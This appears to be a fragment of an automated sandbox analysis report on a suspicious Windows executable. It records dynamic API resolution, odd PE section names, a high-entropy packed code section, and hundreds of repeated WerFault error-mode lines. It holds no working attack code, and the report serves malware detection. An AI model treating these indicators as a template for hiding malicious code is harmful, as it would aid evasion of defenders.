                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                    Source: mJXdkcP4Wx.exeStatic PE information: section name: .notiza
                    Source: mJXdkcP4Wx.exeStatic PE information: section name: .vumob
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_0041B035 push ecx; ret 0_2_0041B048
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_0040020D pushfd ; iretd 0_2_00400211
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_0076B5DB push 7DD07DC0h; iretd 0_2_0076B5EC
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_0076E5BA push eax; ret 0_2_0076E5C9
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_0076E5AB push eax; ret 0_2_0076E5C9
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_0076AAD5 pushfd ; iretd 0_2_0076AAD8
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022DB29C push ecx; ret 0_2_022DB2AF
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022C0F56 pushfd ; iretd 0_2_022C1078
                    Source: mJXdkcP4Wx.exeStatic PE information: section name: .text entropy: 7.877215506573334
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
